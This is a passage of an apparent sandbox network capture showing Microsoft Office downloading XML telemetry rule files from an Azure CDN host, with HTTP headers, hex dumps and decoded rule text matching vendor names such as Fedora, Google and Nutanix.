                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:59 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 491
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                            x-ms-request-id: 721d8bd8-801e-002a-4f00-1731dc000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030859Z-1657d5bbd48f7nlxc7n5fnfzh000000003xg00000000rqna
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            72192.168.2.54979713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:00 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:00 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 416
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                            x-ms-request-id: 9e1fd194-201e-00aa-46dc-183928000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030900Z-1657d5bbd48qjg85buwfdynm5w00000004e000000000grek
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:00 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            73192.168.2.54979813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:00 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:00 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 479
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                            x-ms-request-id: 27b6de9f-001e-0046-1e00-17da4b000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030900Z-1657d5bbd482lxwq1dp2t1zwkc000000042g00000000mxn9
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:00 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            74192.168.2.54980013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:00 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:00 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 471
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                            x-ms-request-id: 2f3972b1-401e-0035-1b02-1782d8000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030900Z-1657d5bbd48vhs7r2p1ky7cs5w00000004q000000000ddsf
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:00 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            75192.168.2.54979913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:00 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:00 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 415
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                            x-ms-request-id: cc92db4a-701e-0053-3460-173a0a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030900Z-1657d5bbd487nf59mzf5b3gk8n0000000440000000001e78
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:00 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            76192.168.2.54980113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:00 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:00 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 419
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                            x-ms-request-id: 1ed82642-401e-0048-7b12-170409000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030900Z-1657d5bbd48vlsxxpe15ac3q7n00000004dg000000006vy1
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            77192.168.2.54980213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:01 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 477
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                            x-ms-request-id: a04ea264-601e-0084-12f6-186b3f000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030901Z-1657d5bbd48brl8we3nu8cxwgn00000004u0000000000g1s
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:01 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            78192.168.2.54980313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:01 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 419
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                            x-ms-request-id: 3a03d6b9-d01e-0066-52e9-16ea17000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030901Z-1657d5bbd48vhs7r2p1ky7cs5w00000004s0000000006vzq
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:01 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            79192.168.2.54980513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:01 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 419
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                            x-ms-request-id: 46a5aa72-701e-0032-6004-17a540000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030901Z-1657d5bbd48cpbzgkvtewk0wu000000004c000000000r1a0
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:01 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            80192.168.2.54980613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:01 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 472
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                            x-ms-request-id: d803a4ff-401e-0083-3904-17075c000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030901Z-1657d5bbd48vlsxxpe15ac3q7n00000004a000000000kn6a
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            81192.168.2.54980413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:01 UTC470INHTTP/1.1 200 OK
